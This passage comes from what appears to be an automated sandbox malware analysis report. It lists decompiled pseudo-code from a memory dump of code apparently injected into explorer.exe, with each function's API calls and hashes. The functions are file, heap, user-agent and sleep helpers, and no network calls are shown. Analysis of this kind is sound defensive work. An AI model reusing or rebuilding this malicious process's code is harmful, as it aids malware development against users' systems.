                  			}

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateDriveHeapType
                  • String ID:
                  • API String ID: 414167704-0
                  • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                  • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
                  • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
                  • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E0008E450(void* __ecx, void* __edx) {
                  				char _v8;
                  				intOrPtr* _t5;
                  				intOrPtr _t10;
                  				intOrPtr* _t11;
                  				void* _t12;
                  
                  				_push(__ecx);
                  				_t5 =  *0x9e6b0; // 0x12d0468
                  				if( *_t5 == 0) {
                  					_v8 = E000895C7(0x2a7);
                  					 *0x9e788 = E000891A6(_t6, 0);
                  					E000885C2( &_v8);
                  					goto L4;
                  				} else {
                  					_v8 = 0x100;
                  					_t10 = E00088604(0x101);
                  					 *0x9e788 = _t10;
                  					_t11 =  *0x9e6b0; // 0x12d0468
                  					_t12 =  *_t11(0, _t10,  &_v8); // executed
                  					if(_t12 == 0) {
                  						L4:
                  						return 0;
                  					} else {
                  						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
                  					}
                  				}
                  			}

                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Heap$AgentAllocateFreeObtainStringUser
                  • String ID:
                  • API String ID: 471734292-0
                  • Opcode ID: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
                  • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
                  • Opcode Fuzzy Hash: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
                  • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t13;
                  				void* _t21;
                  				void* _t23;
                  				void* _t26;
                  
                  				_t23 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t26 = 0;
                  				_v12 = __ecx;
                  				_t21 = __edx;
                  				if(_a4 == 0) {
                  					L3:
                  					_t13 = 1;
                  				} else {
                  					while(1) {
                  						_v8 = _v8 & 0x00000000;
                  						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                  							break;
                  						}
                  						_t26 = _t26 + _v8;
                  						_t23 = _v12;
                  						if(_t26 < _a4) {
                  							continue;
                  						} else {
                  							goto L3;
                  						}
                  						goto L4;
                  					}
                  					_t13 = 0;
                  				}
                  				L4:
                  				return _t13;
                  			}

                  APIs
                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
                  • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
                  • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A5F7(WCHAR* __ecx, long __edx) {
                  				intOrPtr _t6;
                  				long _t12;
                  				void* _t13;
                  
                  				_t12 = __edx;
                  				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                  				if(_t13 != 0xffffffff) {
                  					if(_t12 == 4) {
                  						_t6 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                  					}
                  					return _t13;
                  				}
                  				return 0;
                  			}

                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
                  • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
                  • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00083017() {
                  				signed int _t4;
                  				intOrPtr _t8;
                  				void* _t11;
                  
                  				_t4 =  *0x9e688; // 0xb0000
                  				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
                  					L3:
                  					return _t4 | 0xffffffff;
                  				} else {
                  					_t4 = E0008BB20(_t11);
                  					if(_t4 != 0) {
                  						goto L3;
                  					} else {
                  						AllocConsole();
                  						_t8 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
                  						return 0;
                  					}
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocConsole
                  • String ID:
                  • API String ID: 4167703944-0
                  • Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                  • Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
                  • Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
                  • Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0008A63B(WCHAR* __ecx) {
                  				signed int _t5;
                  
                  				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                  				_t2 = _t5 + 1; // 0x1
                  				asm("sbb ecx, ecx");
                  				return _t5 &  ~_t2;
                  			}

                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
                  • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
                  • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00088604(long _a4) {
                  				void* _t2;
                  
                  				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                  				return _t2;
                  			}

                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                  • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008B269(WCHAR* __ecx) {
                  
                  				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                  			}

                  APIs
                  • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
                  • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
                  • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E000885EF() {
                  				void* _t1;
                  
                  				_t1 = HeapCreate(0, 0x80000, 0); // executed
                  				 *0x9e768 = _t1;
                  				return _t1;
                  			}

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                  • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008F9BF(void* __edx) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _t26;
                  				char _t27;
                  				intOrPtr _t29;
                  				void* _t31;
                  				void* _t36;
                  				char _t38;
                  				intOrPtr _t39;
                  				char _t42;
                  				intOrPtr _t51;
                  				intOrPtr _t52;
                  				intOrPtr* _t63;
                  				intOrPtr _t66;
                  				char* _t67;
                  				intOrPtr _t69;
                  				char _t78;
                  				void* _t81;
                  				void* _t82;
                  
                  				_t26 =  *0x9e654; // 0x40fd20
                  				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
                  				_v12 = _t27;
                  				if(_t27 != 0) {
                  					_t63 =  *0x9e654; // 0x40fd20
                  					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                  						E000886E1(_t27,  *_t63, 0x400);
                  						_v8 = 0;
                  						_t36 = E0008109A(_t63, 0x34a);
                  						_t66 =  *0x9e688; // 0xb0000
                  						_t72 =  !=  ? 0x67d : 0x615;
                  						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                  						_push(0);
                  						_push(_t36);
                  						_t67 = "\\";
                  						_v24 = _t38;
                  						_push(_t67);
                  						_push(_t38);
                  						_t39 =  *0x9e688; // 0xb0000
                  						_push(_t67);
                  						_v20 = E000892E5(_t39 + 0x1020);
                  						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                  						_v16 = _t42;
                  						E000885D5( &_v24);
                  						E000885D5( &_v20);
                  						_t73 = _v16;
                  						_t82 = _t81 + 0x3c;
                  						_t69 = _v8;
                  						if(_v16 != 0 && _t69 > 0x400) {
                  							_t51 =  *0x9e654; // 0x40fd20
                  							_t52 =  *((intOrPtr*)(_t51 + 4));
                  							_t53 =  <  ? _t69 : _t52;
                  							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                  							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                  							_t69 = _v8;
                  							_t82 = _t82 + 0xc;
                  						}
                  						E0008861A( &_v16, _t69);
                  						E0008861A( &_v20, 0xfffffffe);
                  						_t27 = _v12;
                  						_t81 = _t82 + 0x10;
                  						_t63 =  *0x9e654; // 0x40fd20
                  					}
                  					_t78 = 0;
                  					while(1) {
                  						_t29 =  *0x9e688; // 0xb0000
                  						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                  						_t81 = _t81 + 0xc;
                  						if(_t31 >= 0) {
                  							break;
                  						}
                  						Sleep(1);
                  						_t78 = _t78 + 1;
                  						if(_t78 < 0x2710) {
                  							_t27 = _v12;
                  							_t63 =  *0x9e654; // 0x40fd20
                  							continue;
                  						}
                  						break;
                  					}
                  					E0008861A( &_v12, 0); // executed
                  				}
                  				return 0;
                  			}


























                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapSleep
                  • String ID:
                  • API String ID: 4201116106-0
                  • Opcode ID: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
                  • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                  • Opcode Fuzzy Hash: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
                  • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
                  				char _v8;
                  				WCHAR* _v12;
                  				signed int _v16;
                  				WCHAR* _v20;
                  				short _t30;
                  				short _t33;
                  				intOrPtr _t38;
                  				intOrPtr _t43;
                  				intOrPtr _t45;
                  				short _t49;
                  				void* _t52;
                  				char _t71;
                  				WCHAR* _t72;
                  
                  				_v16 = _v16 & 0x00000000;
                  				_t71 = 0;
                  				_v12 = __ecx;
                  				_t49 = __edx;
                  				_v8 = 0;
                  				_t72 = E00088604(0x448);
                  				_v20 = _t72;
                  				_pop(_t52);
                  				if(_t72 != 0) {
                  					_t72[0x21a] = __edx;
                  					_t72[0x21c] = _a8;
                  					lstrcpynW(_t72, _v12, 0x200);
                  					if(_t49 != 1) {
                  						_t30 = E00088604(0x100000);
                  						_t72[0x212] = _t30;
                  						if(_t30 != 0) {
                  							_t69 = _a4;
                  							_t72[0x216] = 0x100000;
                  							if(_a4 != 0) {
                  								E000887EA(_t72, _t69);
                  							}
                  							L16:
                  							return _t72;
                  						}
                  						L7:
                  						if(_t71 != 0) {
                  							E0008861A( &_v8, 0);
                  						}
                  						L9:
                  						_t33 = _t72[0x218];
                  						if(_t33 != 0) {
                  							_t38 =  *0x9e684; // 0x40f8f0
                  							 *((intOrPtr*)(_t38 + 0x30))(_t33);
                  						}
                  						_t73 =  &(_t72[0x212]);
                  						if(_t72[0x212] != 0) {
                  							E0008861A(_t73, 0);
                  						}
                  						E0008861A( &_v20, 0);
                  						goto L1;
                  					}
                  					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
                  					_t71 = _t43;
                  					_v8 = _t71;
                  					if(_t71 == 0) {
                  						goto L9;
                  					}
                  					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
                  						goto L7;
                  					} else {
                  						_t45 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
                  						_t72[0x218] = _t72[0x218] & 0x00000000;
                  						E0008861A( &_v8, 0);
                  						goto L16;
                  					}
                  				}
                  				L1:
                  				return 0;
                  			}

















                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeaplstrcpyn
                  • String ID:
                  • API String ID: 680773602-0
                  • Opcode ID: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
                  • Instruction ID: 64513cba4c22b50501068f9bc6ddcaf5db25fa6591ecaf2876deda848e4e3f01
                  • Opcode Fuzzy Hash: 5beacecdb8d78057d78b25741919f4baf88fb2d4c825de191405f0dc12551294
                  • Instruction Fuzzy Hash: F831A476A00704EFEB24AB64D845B9E77E9FF40720FA4802AF58597182EF30A9008759
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E0008E2C6(void* __fp0, intOrPtr _a4) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				void* _v24;
                  				void* _v28;
                  				char _v32;
                  				char _v544;
                  				signed int _t40;
                  				intOrPtr _t41;
                  				intOrPtr _t48;
                  				intOrPtr _t58;
                  				void* _t65;
                  				intOrPtr _t66;
                  				void* _t70;
                  				signed int _t73;
                  				void* _t75;
                  				void* _t77;
                  
                  				_t77 = __fp0;
                  				_v20 = 0;
                  				_v28 = 0;
                  				_v24 = 0;
                  				_t66 =  *0x9e6b4; // 0x40fa98, executed
                  				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
                  				if(_t40 == 0) {
                  					_t73 = 0;
                  					if(_v20 <= 0) {
                  						L9:
                  						_t41 =  *0x9e6b4; // 0x40fa98
                  						 *((intOrPtr*)(_t41 + 0xc))(_v8);
                  						return 0;
                  					}
                  					do {
                  						_v16 = 0;
                  						_v12 = 0;
                  						_t48 =  *0x9e68c; // 0x40fab8
                  						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
                  						_t70 = E00088604(_v16 + 1);
                  						if(_t70 != 0) {
                  							_v12 = 0x200;
                  							_push( &_v32);
                  							_push( &_v12);
                  							_push( &_v544);
                  							_push( &_v16);
                  							_push(_t70);
                  							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
                  							_t58 =  *0x9e68c; // 0x40fab8
                  							_push(0);
                  							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
                  								E00084905(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
                  								_t75 = _t75 + 0xc;
                  								Sleep(0xa);
                  							}
                  						}
                  						_t73 = _t73 + 1;
                  					} while (_t73 < _v20);
                  					goto L9;
                  				}
                  				return _t40 | 0xffffffff;
                  			}






















                  APIs
                  • Sleep.KERNELBASE(0000000A), ref: 0008E394
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                  • Instruction ID: e635acd6545c028ba9738aa5c2d2b45a4d4bacefc4d1d6fb49a4fa282b584d3e
                  • Opcode Fuzzy Hash: 55dd7addf54f45142deee05b970d0165f7df5fc7e663c1bf0151b2cfcf883a55
                  • Instruction Fuzzy Hash: EB3108B6900119AFEB11DF94CD88EEEBBBCFB08350F1142AAB551E7251D7309E018B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A3ED(signed int __ecx, intOrPtr* __edx, void* __fp0) {
                  				intOrPtr _v8;
                  				signed int _v16;
                  				char _v20;
                  				void* _t24;
                  				char _t25;
                  				signed int _t30;
                  				intOrPtr* _t45;
                  				signed int _t46;
                  				void* _t47;
                  				void* _t54;
                  
                  				_t54 = __fp0;
                  				_t45 = __edx;
                  				_t46 = 0;
                  				_t30 = __ecx;
                  				if( *__edx > 0) {
                  					do {
                  						_t24 = E00089ED0(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8))); // executed
                  						if(_t24 == 0) {
                  							_t25 = E00089749( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8)));
                  							_v8 = _t25;
                  							if(_t25 != 0) {
                  								L6:
                  								_v16 = _v16 & 0x00000000;
                  								_v20 = _t25;
                  								E0008A0AB(_t30,  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + _t46 * 8)), _t54,  &_v20, 8, 2); // executed
                  								_t47 = _t47 + 0xc;
                  							} else {
                  								if(GetLastError() != 0xd) {
                  									_t25 = _v8;
                  									goto L6;
                  								} else {
                  									E00089F48( *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4 + _t46 * 8))); // executed
                  								}
                  							}
                  						}
                  						_t46 = _t46 + 1;
                  					} while (_t46 <  *_t45);
                  				}
                  				return 0;
                  			}














                  APIs
                    • Part of subcall function 00089749: SetLastError.KERNEL32(0000000D,00000000,00000000,0008A341,00000000,00000000,?,?,?,00085AE1), ref: 00089782
                  • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,?,00084C60,?,?,00000000), ref: 0008A424
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction ID: d50668ac3df27808708a7b6c1a3b0588ebee05c3692105c45d8eef2a65c833a9
                  • Opcode Fuzzy Hash: dec015aa1a7b709bd5eeb6a43287c60730ab68ef7ffbe90c1b0272d4dd880f89
                  • Instruction Fuzzy Hash: 8B11A175B00106ABEB10FF68C485AAEF3A9FBD5714F20816AD44297742DBB0ED05CBD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00085D7D(void* __eflags) {
                  				char _v44;
                  				intOrPtr _t7;
                  				intOrPtr _t10;
                  				void* _t11;
                  				WCHAR* _t12;
                  				WCHAR* _t13;
                  				WCHAR* _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				intOrPtr _t22;
                  				void* _t27;
                  				WCHAR* _t28;
                  
                  				_t7 =  *0x9e688; // 0xb0000
                  				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                  				_t10 =  *0x9e684; // 0x40f8f0
                  				_t28 = 2;
                  				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                  				if(_t11 == 0) {
                  					_t22 =  *0x9e688; // 0xb0000
                  					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                  					 *0x9e6ac = _t12;
                  					__eflags = _t12;
                  					if(_t12 != 0) {
                  						_t14 = E00089EBB();
                  						__eflags = _t14;
                  						if(_t14 == 0) {
                  							_t28 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t15 =  *0x9e688; // 0xb0000
                  							lstrcmpiW(_t15 + 0x228, _t14);
                  							asm("sbb esi, esi");
                  							_t28 = _t28 + 1;
                  						}
                  					}
                  					_t13 = _t28;
                  				} else {
                  					_t19 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                  					_t13 = 3;
                  				}
                  				return _t13;
                  			}
















                  APIs
                  • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcmpi
                  • String ID:
                  • API String ID: 1586166983-0
                  • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                  • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008BA05() {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _t15;
                  				void* _t16;
                  				void* _t18;
                  				void* _t21;
                  				intOrPtr _t22;
                  				void* _t24;
                  				void* _t30;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_t15 =  *0x9e68c; // 0x40fab8
                  				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                  				if(_t16 != 0) {
                  					_v12 = _v12 & 0x00000000;
                  					_t18 = E0008B998(1,  &_v12); // executed
                  					_t30 = _t18;
                  					if(_t30 != 0) {
                  						CloseHandle(_v8);
                  						_t21 = _t30;
                  					} else {
                  						if(_v8 != _t18) {
                  							_t22 =  *0x9e684; // 0x40f8f0
                  							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                  						}
                  						_t21 = 0;
                  					}
                  					return _t21;
                  				} else {
                  					return _t16;
                  				}
                  			}













                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                  • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
                  				void _v44;
                  				signed int _t8;
                  				intOrPtr _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t21;
